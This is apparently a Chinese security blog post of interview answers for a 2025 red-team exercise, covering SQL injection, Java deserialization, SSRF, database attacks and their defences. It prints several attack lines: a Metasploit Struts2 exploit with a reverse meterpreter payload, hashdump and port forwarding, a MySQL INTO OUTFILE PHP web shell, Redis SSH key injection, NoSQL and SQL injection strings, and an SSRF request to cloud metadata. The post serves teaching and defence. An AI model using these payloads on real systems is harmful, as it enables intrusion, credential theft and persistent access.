安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 45
1、首先根据简历提问 2、我的一个项目完成的怎么的样 3、Java基础怎么样, 4、有没有自己动手写过一些工具 5、有没有想过自己以后要写一下扫描器 6、sql注入的简单原理及其如何防御 7、有没有了解过反序列化 尤其是Java方向的 8、数据结构还记得多少 9、src主要挖掘一些什么类型的漏洞 10、了解的MSF框架怎么样 11、数据库主要了解的哪些,主要学的什么数据库 12、ssrf的原理及其防御
1. 根据简历提问的典型方向
面试官可能关注点:
- 项目技术深度:如何解决高并发/安全防护问题?
- 漏洞实战经验:SRC提交案例(如越权、RCE)的具体复现过程。
- 工具开发能力:自研工具的技术选型(如Python/Java框架选择)。
- 学习与成长:如何跟进最新漏洞(如Log4j2)并快速验证?
2. 项目完成情况(示例:漏洞扫描平台)
技术架构:
mermaid
graph TB A[任务调度] --> B(分布式节点) B --> C{漏洞检测引擎} C --> D[SQL注入/XSS] C --> E[反序列化/SSRF] C --> F[逻辑漏洞]
核心指标:
- 支持200+并发扫描任务,响应时间<3秒(Redis队列优化)
- 集成15种漏洞POC插件,误报率<8%
- 实现自动化报告生成(PDF/HTML),节省人工80%时间
3. Java基础能力矩阵
模块 关键掌握点 安全领域关联 JVM 内存泄漏排查(MAT工具)、GC调优 内存马检测、反序列化漏洞利用链分析 并发 线程池参数优化(核心线程数/队列策略) 高并发扫描任务调度、竞态条件防御 框架 Spring AOP实现权限控制、MyBatis SQL注入防护 安全中间件开发(如RASP)
4. 自研工具案例
- 工具名称:SubDomainBruter
- 技术栈:Python异步IO(aiohttp)+ 字典树优化
- 功能:支持50万级子域名爆破,识别泛解析绕过
- 创新点:DNS缓存复用(减少50%请求)、智能超时控制
- 工具名称:ReqRepeater(HTTP请求重放)
- 技术栈:Java Netty + 插件化设计
- 功能:支持修改Header/Body、自动化CSRF Token提取
5. 扫描器设计规划
架构分层:
- 爬虫层:Headless Chrome动态渲染(反爬绕过)
- 分析层:参数污染检测(如URL/JSON/XML输入点)
- 检测层:
- SQLi:基于语法树变异(如WHERE条件拆分)
- SSRF:DNS重绑定攻击模拟
- 反序列化:黑名单类检测(如Apache Commons链)
6. SQL注入原理与防御
攻击本质:
sql
-- 恶意输入:' OR 1=1 -- SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = 'xxx';
防御体系:
层级 措施 示例 代码层 预编译(PreparedStatement) stmt.setString(1, userInput)
框架层 MyBatis #{ }占位符 <select id="query" parameterType="String">
运维层 WAF规则(正则匹配union/select) ModSecurity CRS规则集
7. Java反序列化漏洞
利用链示例(Apache Commons Collections 3.1):
java
ObjectInputStream.readObject() → InvokerTransformer.transform() → Runtime.getRuntime().exec("calc.exe");
防御方案:
- 输入过滤:禁止接收序列化数据(替换为JSON)
- JVM加固:添加启动参数限制反序列化类
bash
-Djdk.serializationFilter=!org.apache.commons.collections.functors.*
- 依赖管理:升级安全版本(如CC 3.2.2+)
8. 数据结构在安全中的应用
结构 应用场景 案例 红黑树 WAF规则高效匹配(时间复杂度O(log n)) 敏感词过滤(10万级规则实时检测) 图数据库 漏洞关联分析(CVE依赖关系) Neo4j构建攻击路径图谱 布隆过滤器 恶意IP快速去重(空间效率优化) 扫描器IP黑名单缓存(误判率0.1%)
9. SRC漏洞挖掘方向
高频漏洞类型:
- 逻辑漏洞:
- 订单金额篡改(前端校验绕过)
- 短信轰炸(接口无限调用)
- 配置错误:
- 调试接口泄漏(如Swagger未授权)
- 默认凭证(Admin/Admin)
- 新组件漏洞:
- FastJSON反序列化(AutoType绕过)
- Shiro RememberMe密钥硬编码
10. MSF框架进阶使用
模块化攻击流程:
bash
# 1. 漏洞利用 use exploit/multi/http/struts2_rest_xstream set RHOSTS 192.168.1.100 set PAYLOAD java/meterpreter/reverse_http set LHOST 攻击者IP run -j # 2. 后渗透阶段 meterpreter > migrate 进程ID # 进程迁移 meterpreter > hashdump # 提取密码哈希 meterpreter > portfwd add -L 内网IP -l 8080 -p 80 -r 目标内网IP # 端口转发
11. 数据库安全技术栈
数据库 安全攻防重点 实战案例 MySQL 注入写文件(INTO OUTFILE) SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/shell.php'
Redis 未授权访问SSH密钥写入 CONFIG SET dir /root/.ssh
+SET x "\n\nssh-rsa AAA...\n\n"
MongoDB NoSQL注入($ne绕过) http://example.com/login?user[$ne]=1&pass[$ne]=1
12. SSRF原理与防御
攻击链演示:
http
GET /api/proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1 Host: victim.com
分层防御方案:
- 协议控制:禁用
file://
、gopher://
等高危协议- 域名白名单:仅允许访问可信域名(如
*.example.com
)- 请求过滤:
java
if (url.contains("169.254.169.254")) throw new SSRFException(); // 拦截AWS元数据
- 网络隔离:业务服务器禁止出站流量至内网段